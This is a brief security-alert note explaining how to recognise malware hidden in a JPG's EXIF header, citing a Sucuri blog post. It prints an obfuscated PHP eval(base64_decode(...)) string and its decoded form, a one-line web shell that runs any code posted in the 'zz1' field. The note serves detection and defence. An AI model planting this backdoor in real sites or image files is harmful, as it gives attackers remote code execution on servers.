Base64 alerts

Base64 encoding alerts are usually low impact, but if you see a string like this:

......JFIF..............Exif..II*...............&.......m...,......./.*/e.eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));....

Which decodes to this:

if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}

it’s indicative of malware hiding in a JPG.

http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html